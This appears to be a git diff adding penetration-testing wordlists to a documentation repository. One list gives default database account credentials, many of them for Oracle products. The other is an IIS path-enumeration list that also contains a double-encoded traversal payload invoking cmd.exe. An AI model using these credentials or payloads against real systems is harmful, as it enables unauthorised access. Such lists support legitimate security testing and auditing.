+GCS3:GCS3
+GCS:GCS
+GEORGIAWINE:GEORGIAWINE
+GLA1:GLA1
+GLA2:GLA2
+GLA3:GLA3
+GLA4:GLA4
+gl:gl
+GL:GL
+GLS1:GLS1
+GLS2:GLS2
+GLS3:GLS3
+GLS4:GLS4
+gma:gma
+GMA:GMA
+GM_AWDA:GM_AWDA
+GM_COPI:GM_COPI
+gmd:gmd
+GMD:GMD
+GM_DPHD:GM_DPHD
+gme:gme
+GME:GME
+gmf:gmf
+GMF:GMF
+gmi:gmi
+GMI:GMI
+gml:gml
+GML:GML
+GM_MLCT:GM_MLCT
+gmp:gmp
+GMP:GMP
+GM_PLADMA:GM_PLADMA
+GM_PLADMH:GM_PLADMH
+GM_PLCCA:GM_PLCCA
+GM_PLCCH:GM_PLCCH
+GM_PLCOMA:GM_PLCOMA
+GM_PLCOMH:GM_PLCOMH
+GM_PLCONA:GM_PLCONA
+GM_PLCONH:GM_PLCONH
+GM_PLNSCA:GM_PLNSCA
+GM_PLNSCH:GM_PLNSCH
+GM_PLSCTA:GM_PLSCTA
+GM_PLSCTH:GM_PLSCTH
+GM_PLVET:GM_PLVET
+gms:gms
+GMS:GMS
+GM_SPO:GM_SPO
+GM_STKH:GM_STKH
+gpfd:gpfd
+GPFD:GPFD
+gpld:gpld
+GPLD:GPLD
+gr:gr
+GR:GR
+GUEST:GUEST
+hades:hades
+HADES:HADES
+HCC:HCC
+hcpark:hcpark
+HCPARK:HCPARK
+HHCFO:HHCFO
+hlw:hlw
+HLW:HLW
+hr:change_on_install
+HR:CHANGE_ON_INSTALL
+hr:hr
+HR:HR
+hri:hri
+HRI:HRI
+hr:unknown
+HR:UNKNOWN
+hvst:hvst
+HVST:HVST
+hxc:hxc
+HXC:HXC
+hxt:hxt
+HXT:HXT
+IA:IA
+iba:iba
+IBA:IBA
+IBC:IBC
+ibe:ibe
+IBE:IBE
+ibp:ibp
+IBP:IBP
+ibu:ibu
+IBU:IBU
+iby:iby
+IBY:IBY
+icdbown:icdbown
+ICDBOWN:ICDBOWN
+icx:icx
+ICX:ICX
+idemo_user:idemo_user
+IDEMO_USER:IDEMO_USER
+ieb:ieb
+IEB:IEB
+iec:iec
+IEC:IEC
+iem:iem
+IEM:IEM
+ieo:ieo
+IEO:IEO
+ies:ies
+IES:IES
+ieu:ieu
+IEU:IEU
+iex:iex
+IEX:IEX
+ifssys:ifssys
+IFSSYS:IFSSYS
+igc:igc
+IGC:IGC
+igf:igf
+IGF:IGF
+igi:igi
+IGI:IGI
+igs:igs
+IGS:IGS
+igw:igw
+IGW:IGW
+imageuser:imageuser
+IMAGEUSER:IMAGEUSER
+imc:imc
+IMC:IMC
+imedia:imedia
+IMEDIA:IMEDIA
+imt:imt
+IMT:IMT
+INS1:INS1
+INS2:INS2
+#internal:oracle
+internal:oracle
+#INTERNAL:ORACLE
+INTERNAL:ORACLE
+#internal:sys_stnt
+internal:sys_stnt
+#INTERNAL:SYS_STNT
+INTERNAL:SYS_STNT
+inv:inv
+INV:INV
+ipa:ipa
+IPA:IPA
+ipd:ipd
+IPD:IPD
+IP:IP
+iplanet:iplanet
+IPLANET:IPLANET
+isc:isc
+ISC:ISC
+ISTEWARD:ISTEWARD
+itg:itg
+ITG:ITG
+ja:ja
+JA:JA
+jake:passwo4
+JAKE:PASSWO4
+JD7333:JD7333
+JD7334:JD7334
+JD9:JD9
+JDEDBA:JDEDBA
+JDE:JDE
+je:je
+JE:JE
+jg:jg
+JG:JG
+jill:passwo2
+JILL:PASSWO2
+jl:jl:
+JL :JL 
+JL:JL
+jmuser:jmuser
+JMUSER:JMUSER
+JOHNINARI:JOHNINARI
+john:john
+JOHN:JOHN
+jones:steel
+JONES:STEEL
+jtf:jtf
+JTF:JTF
+JTI:JTI
+jtm:jtm
+JTM:JTM
+JTR:JTR
+jts:jts
+JTS:JTS
+JUNK_PS:JUNK_PS
+JUSTOSHUM:JUSTOSHUM
+jward:airoplane
+JWARD:AIROPLANE
+KELLYJONES:KELLYJONES
+KEVINDONS:KEVINDONS
+KPN:KPN
+kwalker:kwalker
+KWALKER:KWALKER
+l2ldemo:l2ldemo
+L2LDEMO:L2LDEMO
+LADAMS:LADAMS
+lbacsys:lbacsys
+LBACSYS:LBACSYS
+LBA:LBA
+LDQUAL:LDQUAL
+LHILL:LHILL
+librarian:shelves
+LIBRARIAN:SHELVES
+LNS:LNS
+LQUINCY:LQUINCY
+LSA:LSA
+manprod:manprod
+MANPROD:MANPROD
+mark:passwo3
+MARK:PASSWO3
+mascarm:manager
+MASCARM:MANAGER
+master:password
+MASTER:PASSWORD
+mddata:mddata
+MDDATA:MDDATA
+mddemo_clerk:clerk
+MDDEMO_CLERK:CLERK
+mddemo_clerk:mgr
+MDDEMO_CLERK:MGR
+mddemo:mddemo
+MDDEMO:MDDEMO
+mddemo_mgr:mddemo_mgr
+MDDEMO_MGR:MDDEMO_MGR
+mddemo_mgr:mgr
+MDDEMO_MGR:MGR
+mdsys:mdsys
+MDSYS:MDSYS
+MDSYS:SYS
+me:me
+ME:ME
+mfg:mfg
+MFG:MFG
+MGR1:MGR1
+MGR2:MGR2
+MGR3:MGR3
+MGR4:MGR4
+mgr:mgr
+MGR:MGR
+mgwuser:mgwuser
+MGWUSER:MGWUSER
+migrate:migrate
+MIGRATE:MIGRATE
+MIKEIKEGAMI:MIKEIKEGAMI
+miller:miller
+MILLER:MILLER
+MJONES:MJONES
+MLAKE:MLAKE
+MM1:MM1
+MM2:MM2
+MM3:MM3
+MM4:MM4
+MM5:MM5
+MMARTIN:MMARTIN
+mmo2:mmo2
+MMO2:MMO2
+mmo2:mmo3
+MMO2:MMO3
+mmo2:unknown
+MMO2:UNKNOWN
+MOBILEADMIN:WELCOME
+modtest:yes
+MODTEST:YES
+moreau:moreau
+MOREAU:MOREAU
+mrp:mrp
+MRP:MRP
+msc:msc
+MSC:MSC
+msd:msd
+MSD:MSD
+mso:mso
+MSO:MSO
+msr:msr
+MSR:MSR
+MST:MST
+mtssys:mtssys
+MTSSYS:MTSSYS
+mts_user:mts_password
+MTS_USER:MTS_PASSWORD
+mwa:mwa
+MWA:MWA
+mxagent:mxagent
+MXAGENT:MXAGENT
+names:names
+NAMES:NAMES
+NEILKATSU:NEILKATSU
+neotix_sys:neotix_sys
+NEOTIX_SYS:NEOTIX_SYS
+nneul:nneulpass
+NNEUL:NNEULPASS
+nomeutente:password
+NOMEUTENTE:PASSWORD
+nome_utilizador:senha
+NOME_UTILIZADOR:SENHA
+nom_utilisateur:mot_de_passe
+NOM_UTILISATEUR:MOT_DE_PASSE
+nume_utilizator:parol
+NUME_UTILIZATOR:PAROL
+oas_public:oas_public
+OAS_PUBLIC:OAS_PUBLIC
+OBJ7333:OBJ7333
+OBJ7334:OBJ7334
+OBJB733:OBJB733
+OCA:OCA
+ocitest:ocitest
+OCITEST:OCITEST
+ocm_db_admin:ocm_db_admin
+OCM_DB_ADMIN:OCM_DB_ADMIN
+odm_mtr:mtrpw
+ODM_MTR:MTRPW
+odm:odm
+ODM:ODM
+odscommon:odscommon
+ODSCOMMON:ODSCOMMON
+ods:ods
+ODS:ODS
+ods_server:ods_server
+ODS_SERVER:ODS_SERVER
+oe:change_on_install
+OE:CHANGE_ON_INSTALL
+oemadm:oemadm
+OEMADM:OEMADM
+oemrep:oemrep
+OEMREP:OEMREP
+oe:oe
+OE:OE
+oe:unknown
+OE:UNKNOWN
+okb:okb
+OKB:OKB
+okc:okc
+OKC:OKC
+oke:oke
+OKE:OKE
+oki:oki
+OKI:OKI
+OKL:OKL
+oko:oko
+OKO:OKO
+okr:okr
+OKR:OKR
+oks:oks
+OKS:OKS
+okx:okx
+OKX:OKX
+OL810:OL810
+OL811:OL811
+OL812:OL812
+OL9:OL9
+olapdba:olapdba
+OLAPDBA:OLAPDBA
+olapsvr:instance
+OLAPSVR:INSTANCE
+olapsvr:olapsvr
+OLAPSVR:OLAPSVR
+olapsys:manager
+OLAPSYS:MANAGER
+olapsys:olapsys
+OLAPSYS:OLAPSYS
+omwb_emulation:oracle
+OMWB_EMULATION:ORACLE
+ont:ont
+ONT:ONT
+oo:oo
+OO:OO
+openspirit:openspirit
+OPENSPIRIT:OPENSPIRIT
+opi:opi
+OPI:OPI
+ORABAM:ORABAM
+ORABAMSAMPLES:ORABAMSAMPLES
+ORABPEL:ORABPEL
+oracache:oracache
+ORACACHE:ORACACHE
+oracle:oracle
+ORACLE:ORACLE
+oradba:oradbapass
+ORADBA:ORADBAPASS
+ORAESB:ORAESB
+ORAOCA_PUBLIC:ORAOCA_PUBLIC
+oraprobe:oraprobe
+ORAPROBE:ORAPROBE
+oraregsys:oraregsys
+ORAREGSYS:ORAREGSYS
+ORASAGENT:ORASAGENT
+orasso_ds:orasso_ds
+ORASSO_DS:ORASSO_DS
+orasso:orasso
+ORASSO:ORASSO
+orasso_pa:orasso_pa
+ORASSO_PA:ORASSO_PA
+orasso_ps:orasso_ps
+ORASSO_PS:ORASSO_PS
+orasso_public:orasso_public
+ORASSO_PUBLIC:ORASSO_PUBLIC
+orastat:orastat
+ORASTAT:ORASTAT
+orcladmin:welcome
+ORCLADMIN:WELCOME
+ordcommon:ordcommon
+ORDCOMMON:ORDCOMMON
+ordplugins:ordplugins
+ORDPLUGINS:ORDPLUGINS
+ordsys:ordsys
+ORDSYS:ORDSYS
+ose$http$admin:invalid
+OSE$HTTP$ADMIN:INVALID
+ose$http$admin:invalid:password
+OSE$HTTP$ADMIN:Invalid password
+osm:osm
+OSM:OSM
+osp22:osp22
+OSP22:OSP22
+ota:ota
+OTA:OTA
+outln:outln
+OUTLN:OUTLN
+owa:owa
+OWA:OWA
+owa_public:owa_public
+OWA_PUBLIC:OWA_PUBLIC
+OWAPUB:OWAPUB
+owf_mgr:owf_mgr
+OWF_MGR:OWF_MGR
+owner:owner
+OWNER:OWNER
+ozf:ozf
+OZF:OZF
+ozp:ozp
+OZP:OZP
+ozs:ozs
+OZS:OZS
+PABLO:PABLO
+PAIGE:PAIGE
+PAM:PAM
+panama:panama
+PANAMA:PANAMA
+pa:pa
+PA:PA
+PARRISH:PARRISH
+PARSON:PARSON
+PATORILY:PATORILY
+PAT:PAT
+PATRICKSANCHEZ:PATRICKSANCHEZ
+patrol:patrol
+PATROL:PATROL
+PATSY:PATSY
+PAULA:PAULA
+paul:paul
+PAUL:PAUL
+PAXTON:PAXTON
+PCA1:PCA1
+PCA2:PCA2
+PCA3:PCA3
+PCA4:PCA4
+PCS1:PCS1
+PCS2:PCS2
+PCS3:PCS3
+PCS4:PCS4
+PD7333:PD7333
+PD7334:PD7334
+PD810:PD810
+PD811:PD811
+PD812:PD812
+PD9:PD9
+PDA1:PDA1
+PEARL:PEARL
+PEG:PEG
+PENNY:PENNY
+PEOPLE:PEOP1E
+PERCY:PERCY
+perfstat:perfstat
+PERFSTAT:PERFSTAT
+PERRY:PERRY
+perstat:perstat
+PERSTAT:PERSTAT
+PETE:PETE
+PEYTON:PEYTON
+PHIL:PHIL
+PJI:PJI
+pjm:pjm
+PJM:PJM
+planning:planning
+PLANNING:PLANNING
+plex:plex
+PLEX:PLEX
+plsql:supersecret
+PLSQL:SUPERSECRET
+pm:change_on_install
+PM:CHANGE_ON_INSTALL
+pmi:pmi
+PMI:PMI
+pm:pm
+PM:PM
+pm:unknown
+PM:UNKNOWN
+pn:pn
+PN:PN
+po7:po7
+PO7:PO7
+po8:po8
+PO8:PO8
+poa:poa
+POA:POA
+POLLY:POLLY
+pom:pom
+POM:POM
+PON:PON
+po:po
+PO:PO
+portal30_admin:portal30_admin
+PORTAL30_ADMIN:PORTAL30_ADMIN
+portal30_demo:portal30_demo
+PORTAL30_DEMO:PORTAL30_DEMO
+portal30:portal30
+PORTAL30:PORTAL30
+portal30:portal31
+PORTAL30:PORTAL31
+portal30_ps:portal30_ps
+PORTAL30_PS:PORTAL30_PS
+portal30_public:portal30_public
+PORTAL30_PUBLIC:PORTAL30_PUBLIC
+portal30_sso_admin:portal30_sso_admin
+PORTAL30_SSO_ADMIN:PORTAL30_SSO_ADMIN
+portal30_sso:portal30_sso
+PORTAL30_SSO:PORTAL30_SSO
+portal30_sso_ps:portal30_sso_ps
+PORTAL30_SSO_PS:PORTAL30_SSO_PS
+portal30_sso_public:portal30_sso_public
+PORTAL30_SSO_PUBLIC:PORTAL30_SSO_PUBLIC
+PORTAL_APP:PORTAL_APP
+portal_demo:portal_demo
+PORTAL_DEMO:PORTAL_DEMO
+PORTAL:PORTAL
+PORTAL_PUBLIC:PORTAL_PUBLIC
+portal_sso_ps:portal_sso_ps
+PORTAL_SSO_PS:PORTAL_SSO_PS
+pos:pos
+POS:POS
+powercartuser:powercartuser
+POWERCARTUSER:POWERCARTUSER
+PPM1:PPM1
+PPM2:PPM2
+PPM3:PPM3
+PPM4:PPM4
+PPM5:PPM5
+primary:primary
+PRIMARY:PRIMARY
+PRISTB733:PRISTB733
+PRISTCTL:PRISTCTL
+PRISTDTA:PRISTDTA
+PRODB733:PRODB733
+PRODCTL:PRODCTL
+PRODDTA:PRODDTA
+PRODUSER:PRODUSER
+PROJMFG:WELCOME
+PRP:PRP
+PS810CTL:PS810CTL
+PS810DTA:PS810DTA
+PS810:PS810
+PS811CTL:PS811CTL
+PS811DTA:PS811DTA
+PS811:PS811
+PS812CTL:PS812CTL
+PS812DTA:PS812DTA
+PS812:PS812
+psa:psa
+PSA:PSA
+PSBASS:PSBASS
+psb:psb
+PSB:PSB
+PSEM:PSEM
+PSFTDBA:PSFTDBA
+PSFT:PSFT
+psp:psp
+PSP:PSP
+PS:PS
+PTADMIN:PTADMIN
+PTCNE:PTCNE
+PTDMO:PTDMO
+PTE:PTE
+PTESP:PTESP
+PTFRA:PTFRA
+PTGER:PTGER
+PTG:PTG
+PTJPN:PTJPN
+PTUKE:PTUKE
+PTUPG:PTUPG
+PTWEB:PTWEB
+PTWEBSERVER:PTWEBSERVER
+pubsub1:pubsub1
+PUBSUB1:PUBSUB1
+pubsub:pubsub
+PUBSUB:PUBSUB
+pv:pv
+PV:PV
+PY7333:PY7333
+PY7334:PY7334
+PY810:PY810
+PY811:PY811
+PY812:PY812
+PY9:PY9
+qa:qa
+QA:QA
+qdba:qdba
+QDBA:QDBA
+QOT:QOT
+qp:qp
+QP:QP
+QRM:QRM
+qs_adm:change_on_install
+QS_ADM:CHANGE_ON_INSTALL
+qs_adm:qs_adm
+QS_ADM:QS_ADM
+qs_adm:unknown
+QS_ADM:UNKNOWN
+qs_cbadm:change_on_install
+QS_CBADM:CHANGE_ON_INSTALL
+qs_cbadm:qs_cbadm
+QS_CBADM:QS_CBADM
+qs_cbadm:unknown
+QS_CBADM:UNKNOWN
+qs_cb:change_on_install
+QS_CB:CHANGE_ON_INSTALL
+qs_cb:qs_cb
+QS_CB:QS_CB
+qs_cb:unknown
+QS_CB:UNKNOWN
+qs:change_on_install
+QS:CHANGE_ON_INSTALL
+qs_cs:change_on_install
+QS_CS:CHANGE_ON_INSTALL
+qs_cs:qs_cs
+QS_CS:QS_CS
+qs_cs:unknown
+QS_CS:UNKNOWN
+qs_es:change_on_install
+QS_ES:CHANGE_ON_INSTALL
+qs_es:qs_es
+QS_ES:QS_ES
+qs_es:unknown
+QS_ES:UNKNOWN
+qs_os:change_on_install
+QS_OS:CHANGE_ON_INSTALL
+qs_os:qs_os
+QS_OS:QS_OS
+qs_os:unknown
+QS_OS:UNKNOWN
+qs:qs
+QS:QS
+qs:unknown
+QS:UNKNOWN
+qs_ws:change_on_install
+QS_WS:CHANGE_ON_INSTALL
+qs_ws:qs_ws
+QS_WS:QS_WS
+qs_ws:unknown
+QS_WS:UNKNOWN
+RENE:RENE
+repadmin:repadmin
+REPADMIN:REPADMIN
+rep_manager:demo
+REP_MANAGER:DEMO
+reports:reports
+REPORTS:REPORTS
+reports_user:oem_temp
+REPORTS_USER:OEM_TEMP
+rep_owner:demo
+REP_OWNER:DEMO
+rep_owner:rep_owner
+REP_OWNER:REP_OWNER
+rep_user:demo
+REP_USER:DEMO
+re:re
+RE:RE
+RESTRICTED_US:RESTRICTED_US
+rg:rg
+RG:RG
+rhx:rhx
+RHX:RHX
+rla:rla
+RLA:RLA
+rlm:rlm
+RLM:RLM
+RM1:RM1
+RM2:RM2
+RM3:RM3
+RM4:RM4
+RM5:RM5
+rmail:rmail
+RMAIL:RMAIL
+rman:rman
+RMAN:RMAN
+ROB:ROB
+RPARKER:RPARKER
+rrs:rrs
+RRS:RRS
+RWA1:RWA1
+SALLYH:SALLYH
+sample:sample
+SAMPLE:SAMPLE
+SAM:SAM
+sap:06071992
+SAP:06071992
+sapr3:sap
+SAPR3:SAP
+sap:sapr3
+SAP:SAPR3
+SARAHMANDY:SARAHMANDY
+SCM1:SCM1
+SCM2:SCM2
+SCM3:SCM3
+SCM4:SCM4
+scott:tiger
+SCOTT:TIGER
+scott:tigger
+SCOTT:TIGGER
+SDAVIS:SDAVIS
+sdos_icsap:sdos_icsap
+SDOS_ICSAP:SDOS_ICSAP
+secdemo:secdemo
+SECDEMO:SECDEMO
+SEDWARDS:SEDWARDS
+SELLCM:SELLCM
+SELLER:SELLER
+SELLTREAS:SELLTREAS
+serviceconsumer1:serviceconsumer1
+SERVICECONSUMER1:SERVICECONSUMER1
+SERVICES:WELCOME
+SETUP:SETUP
+sh:change_on_install
+SH:CHANGE_ON_INSTALL
+sh:sh
+SH:SH
+sh:unknown
+SH:UNKNOWN
+SID:SID
+si_informtn_schema:si_informtn_schema
+SI_INFORMTN_SCHEMA:SI_INFORMTN_SCHEMA
+siteminder:siteminder
+SITEMINDER:SITEMINDER
+SKAYE:SKAYE
+SKYTETSUKA:SKYTETSUKA
+slide:slidepw
+SLIDE:SLIDEPW
+SLSAA:SLSAA
+SLSMGR:SLSMGR
+SLSREP:SLSREP
+spierson:spierson
+SPIERSON:SPIERSON
+SRABBITT:SRABBITT
+SRALPHS:SRALPHS
+SRAY:SRAY
+SRIVERS:SRIVERS
+SSA1:SSA1
+SSA2:SSA2
+SSA3:SSA3
+SSC1:SSC1
+SSC2:SSC2
+SSC3:SSC3
+SSOSDK:SSOSDK
+ssp:ssp
+SSP:SSP
+SSS1:SSS1
+starter:starter
+STARTER:STARTER
+strat_user:strat_passwd
+STRAT_USER:STRAT_PASSWD
+SUPPLIER:SUPPLIER
+SVM7333:SVM7333
+SVM7334:SVM7334
+SVM810:SVM810
+SVM811:SVM811
+SVM812:SVM812
+SVM9:SVM9
+SVMB733:SVMB733
+SVP1:SVP1
+swpro:swpro
+SWPRO:SWPRO
+swuser:swuser
+SWUSER:SWUSER
+SY810:SY810
+SY811:SY811
+SY812:SY812
+SY9:SY9
+sympa:sympa
+SYMPA:SYMPA
+sys:0racl3
+SYS:0RACL3
+sys:0racl38
+SYS:0RACL38
+sys:0racl38i
+SYS:0RACL38I
+sys:0racl39
+SYS:0RACL39
+sys:0racl39i
+SYS:0RACL39I
+sys:0racle
+SYS:0RACLE
+sys:0racle8
+SYS:0RACLE8
+sys:0racle8i
+SYS:0RACLE8I
+sys:0racle9
+SYS:0RACLE9
+sys:0racle9i
+SYS:0RACLE9I
+SYS7333:SYS7333
+SYS7334:SYS7334
+sysadmin:sysadmin
+SYSADMIN:SYSADMIN
+sysadm:sysadm
+SYSADM:SYSADM
+SYSB733:SYSB733
+sys:change_on_install
+SYS:CHANGE_ON_INSTALL
+sys:d_syspw
+SYS:D_SYSPW
+sys:manag3r
+SYS:MANAG3R
+sys:manager
+SYS:MANAGER
+sysman:oem_temp
+SYSMAN:OEM_TEMP
+sysman:sysman
+SYSMAN:SYSMAN
+SYSMAN:WELCOME1
+sys:oracl3
+SYS:ORACL3
+sys:oracle
+SYS:ORACLE
+sys:oracle8
+SYS:ORACLE8
+sys:oracle8i
+SYS:ORACLE8I
+sys:oracle9
+SYS:ORACLE9
+sys:oracle9i
+SYS:ORACLE9I
+sys:sys
+SYS:SYS
+sys:syspass
+SYS:SYSPASS
+system:0racl3
+SYSTEM:0RACL3
+system:0racl38
+SYSTEM:0RACL38
+system:0racl38i
+SYSTEM:0RACL38I
+system:0racl39
+SYSTEM:0RACL39
+system:0racl39i
+SYSTEM:0RACL39I
+system:0racle
+SYSTEM:0RACLE
+system:0racle8
+SYSTEM:0RACLE8
+system:0racle8i
+SYSTEM:0RACLE8I
+system:0racle9
+SYSTEM:0RACLE9
+system:0racle9i
+SYSTEM:0RACLE9I
+system:change_on_install
+SYSTEM:CHANGE_ON_INSTALL
+system:d_syspw
+SYSTEM:D_SYSPW
+system:d_systpw
+SYSTEM:D_SYSTPW
+system:manag3r
+SYSTEM:MANAG3R
+system:manager
+SYSTEM:MANAGER
+system:oracl3
+SYSTEM:ORACL3
+system:oracle
+SYSTEM:ORACLE
+system:oracle8
+SYSTEM:ORACLE8
+system:oracle8i
+SYSTEM:ORACLE8I
+system:oracle9
+SYSTEM:ORACLE9
+system:oracle9i
+SYSTEM:ORACLE9I
+system:system
+SYSTEM:SYSTEM
+system:systempass
+SYSTEM:SYSTEMPASS
+SYSTEM:WELCOME1
+SYS:WELCOME1
+tahiti:tahiti
+TAHITI:TAHITI
+talbot:mt6ch5
+TALBOT:MT6CH5
+TDEMARCO:TDEMARCO
+tdos_icsap:tdos_icsap
+TDOS_ICSAP:TDOS_ICSAP
+tec:tectec
+TEC:TECTEC
+TESTCTL:TESTCTL
+TESTDTA:TESTDTA
+test:passwd
+TEST:PASSWD
+testpilot:testpilot
+TESTPILOT:TESTPILOT
+test:test
+TEST:TEST
+test_user:test_user
+TEST_USER:TEST_USER
+thinsample:thinsamplepw
+THINSAMPLE:THINSAMPLEPW
+tibco:tibco
+TIBCO:TIBCO
+tip37:tip37
+TIP37:TIP37
+TRA1:TRA1
+tracesvr:trace
+TRACESVR:TRACE
+travel:travel
+TRAVEL:TRAVEL
+TRBM1:TRBM1
+TRCM1:TRCM1
+TRDM1:TRDM1
+TRRM1:TRRM1
+tsdev:tsdev
+TSDEV:TSDEV
+tsuser:tsuser
+TSUSER:TSUSER
+turbine:turbine
+TURBINE:TURBINE
+TWILLIAMS:TWILLIAMS
+UDDISYS:UDDISYS
+ultimate:ultimate
+ULTIMATE:ULTIMATE
+um_admin:um_admin
+UM_ADMIN:UM_ADMIN
+um_client:um_client
+UM_CLIENT:UM_CLIENT
+user0:user0
+USER0:USER0
+user1:user1
+USER1:USER1
+user2:user2
+USER2:USER2
+user3:user3
+USER3:USER3
+user4:user4
+USER4:USER4
+user5:user5
+USER5:USER5
+user6:user6
+USER6:USER6
+user7:user7
+USER7:USER7
+user8:user8
+USER8:USER8
+user9:user9
+USER9:USER9
+user_name:password
+USER_NAME:PASSWORD
+user:user
+USER:USER
+usuario:clave
+USUARIO:CLAVE
+utility:utility
+UTILITY:UTILITY
+utlbstatu:utlestat
+UTLBSTATU:UTLESTAT
+vea:vea
+VEA:VEA
+veh:veh
+VEH:VEH
+vertex_login:vertex_login
+VERTEX_LOGIN:VERTEX_LOGIN
+VIDEO31:VIDEO31
+VIDEO4:VIDEO4
+VIDEO5:VIDEO5
+videouser:videouser
+VIDEOUSER:VIDEOUSER
+vif_developer:vif_dev_pwd
+VIF_DEVELOPER:VIF_DEV_PWD
+viruser:viruser
+VIRUSER:VIRUSER
+VP1:VP1
+VP2:VP2
+VP3:VP3
+VP4:VP4
+VP5:VP5
+VP6:VP6
+vpd_admin:akf7d98s2
+VPD_ADMIN:AKF7D98S2
+vrr1:unknown
+VRR1:UNKNOWN
+vrr1:vrr1
+VRR1:VRR1
+vrr1:vrr2
+VRR1:VRR2
+WAA1:WAA1
+WAA2:WAA2
+WCRSYS:WCRSYS
+webcal01:webcal01
+WEBCAL01:WEBCAL01
+webdb:webdb
+WEBDB:WEBDB
+webread:webread
+WEBREAD:WEBREAD
+websys:manager
+WEBSYS:MANAGER
+WEBSYS:WELCOME
+webuser:your_pass
+WEBUSER:YOUR_PASS
+WENDYCHO:WENDYCHO
+west:west
+WEST:WEST
+wfadmin:wfadmin
+WFADMIN:WFADMIN
+wh:wh
+WH:WH
+wip:wip
+WIP:WIP
+WIRELESS:WELCOME
+WIRELESS:WIRELESS
+wkadmin:wkadmin
+WKADMIN:WKADMIN
+wkproxy:change_on_install
+WKPROXY:CHANGE_ON_INSTALL
+wkproxy:unknown
+WKPROXY:UNKNOWN
+wkproxy:wkproxy
+WKPROXY:WKPROXY
+wksys:change_on_install
+WKSYS:CHANGE_ON_INSTALL
+wksys:wksys
+WKSYS:WKSYS
+wk_test:wk_test
+WK_TEST:WK_TEST
+wkuser:wkuser
+WKUSER:WKUSER
+wms:wms
+WMS:WMS
+wmsys:wmsys
+WMSYS:WMSYS
+wob:wob
+WOB:WOB
+wps:wps
+WPS:WPS
+wsh:wsh
+WSH:WSH
+wsm:wsm
+WSM:WSM
+wwwuser:wwwuser
+WWWUSER:WWWUSER
+www:www
+WWW:WWW
+xademo:xademo
+XADEMO:XADEMO
+xdb:change_on_install
+XDB:CHANGE_ON_INSTALL
+XDO:XDO
+xdp:xdp
+XDP:XDP
+xla:xla
+XLA:XLA
+XLE:XLE
+XNB:XNB
+xnc:xnc
+XNC:XNC
+xni:xni
+XNI:XNI
+xnm:xnm
+XNM:XNM
+xnp:xnp
+XNP:XNP
+xns:xns
+XNS:XNS
+xprt:xprt
+XPRT:XPRT
+xtr:xtr
+XTR:XTR
+YCAMPOS:YCAMPOS
+YSANCHEZ:YSANCHEZ
+ZFA:ZFA
+ZPB:ZPB
+ZSA:ZSA
+ZX:ZX
diff --git a/.gitbook/assets/iisfinal.txt b/.gitbook/assets/iisfinal.txt
new file mode 100644
index 00000000..79c91a51
--- /dev/null
+++ b/.gitbook/assets/iisfinal.txt
@@ -0,0 +1,1305 @@
+
+1_0_2204
+1_0_2204/
+1_0_2204_21/
+1_0_2914
+1_0_2914/
+1_0_2914_0
+1_0_2914_0/
+1_0_3705
+1_0_3705/
+1_0_3705_0
+1_0_3705_0/
+1_0_3705_209
+1_0_3705_209/
+1_0_3705_288
+1_0_3705_288/
+1_0_3705_6018
+1_0_3705_6018/
+1_1_4322
+1_1_4322/
+1_1_4322 
+1_1_4322 /
+1_1_4322_2032
+1_1_4322_2032/
+1_1_4322_2300
+1_1_4322_2300/
+1_1_4322_2310
+1_1_4322_2310/
+1_1_4322_2407
+1_1_4322_2407/
+1_1_4322_2443
+1_1_4322_2443/
+1_1_4322_510
+1_1_4322_510/
+1_1_4322_573
+1_1_4322_573/
+2_0_40607
+2_0_40607/
+2_0_40607_16
+2_0_40607_16/
+2_0_50215
+2_0_50215/
+2_0_50215_44
+2_0_50215_44/
+2_0_50727
+2_0_50727/
+2_0_50727_1433
+2_0_50727_1433/
+2_0_50727_1434
+2_0_50727_1434/
+2_0_50727_3053
+2_0_50727_3053/
+2_0_50727_3082
+2_0_50727_3082/
+2_0_50727_312
+2_0_50727_312/
+2_0_50727_3603
+2_0_50727_3603/
+2_0_50727_3607
+2_0_50727_3607/
+2_0_50727_3615
+2_0_50727_3615/
+2_0_50727_4016 
+2_0_50727_4016 /
+2_0_50727_42
+2_0_50727_42/
+2_0_50727_4918
+2_0_50727_4918/
+2_0_50727_4927
+2_0_50727_4927/
+2_0_50727_4952
+2_0_50727_4952/
+2_0_50727_832
+2_0_50727_832/
+/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+3_0_4506
+3_0_4506/
+3_0_4506_2123
+3_0_4506_2123/
+3_0_4506_2254
+3_0_4506_2254/
+3_0_4506_26
+3_0_4506_26/
+3_0_4506_30
+3_0_4506_30/
+3_0_4506_590
+3_0_4506_590/
+3_0_4506_648
+3_0_4506_648/
+3_5_20404
+3_5_20404/
+3_5_20404_0
+3_5_20404_0/
+3_5_20706
+3_5_20706/
+3_5_20706_1
+3_5_20706_1/
+3_5_21022
+3_5_21022/
+3_5_21022_8
+3_5_21022_8/
+3_5_30428
+3_5_30428/
+3_5_30428_1
+3_5_30428_1/
+3_5_30729
+3_5_30729/
+3_5_30729_01
+3_5_30729_01/
+3_5_30729_4926
+3_5_30729_4926/
+4_0_20506
+4_0_20506/
+4_0_21006
+4_0_21006/
+4_0_30128
+4_0_30128/
+4_0_30128_1
+4_0_30128_1/
+4_0_30319
+4_0_30319/
+4_0_30319 
+4_0_30319 /
+4_0_30319_1
+4_0_30319_1/
+4_0_30319_17020
+4_0_30319_17020/
+4_0_30319_17379
+4_0_30319_17379/
+4_0_30319_17626
+4_0_30319_17626/
+4_0_30319_17929
+4_0_30319_17929/
+404.asp
+404.aspx
+4_5_40805
+4_5_40805/
+4_5_50131
+4_5_50131/
+4_5_50501
+4_5_50501/
+4_5_50709
+4_5_50709/
+/a%5c.aspx
+about.asp
+About.aspx
+aboutme.asp
+AccessDenied.aspx
+/AccessPlatform/
+/AccessPlatform/auth/
+/AccessPlatform/auth/clientscripts/
+/AccessPlatform/auth/clientscripts/cookies.js 
+/AccessPlatform/auth/clientscripts/login.js 
+AccessTopic.asp
+Account.aspx
+action.asp
+activate.asp
+Active.aspx
+AdAdmin.asp
+Adadmin_Save.asp
+add2.asp
+add.asp
+Add.aspx
+Add_entry.aspx
+addfile.asp
+addnews.asp
+Address.asp
+add_user.asp
+AddUser.aspx
+Add_Vote.asp
+/admin/
+admin_admin.asp
+admin_art.asp
+admin.asp
+admin.aspx
+admin_batch.asp
+admin_boardset.asp
+admin_canmou.asp
+admin_cgglzn.asp
+admin_chengguo.asp
+admin_cmzz.asp
+admin_config.asp
+admin_copyright.asp
+Admin_Decode.asp
+Admin_Default.asp
+admin_diary.asp
+admin_dj.asp
+admin_down.asp
+admin_duiwu.asp
+admin_flash.asp
+admin_flashdel.asp
+admin_flashedit.asp
+admin_gonggao.asp
+administrador.asp
+/administration/
+administration
+administration/
